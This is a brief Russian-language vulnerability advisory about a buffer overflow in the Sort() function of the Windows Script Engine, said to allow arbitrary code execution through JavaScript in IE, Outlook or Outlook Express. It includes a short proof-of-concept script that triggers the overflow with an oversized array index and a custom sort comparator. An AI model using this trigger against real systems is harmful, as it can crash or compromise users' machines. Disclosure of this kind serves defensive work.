В Windows Script Engine в функции Sort() возможно
переполнение буфера и выполнение
произвольного кода на системе. Всего лишь
достаточно выполнить JavaScript в IE, Outlook или Outlook
Express. Пример:
<script>
var trigger = [];
i = 1;
do {
trigger[i] = 1;
}
while(i++ < 10000);
trigger[0x3FFFFFFF] = 1;
trigger.sort(new Function("return 1"));
</script>
Уязвимы все версии Windows.
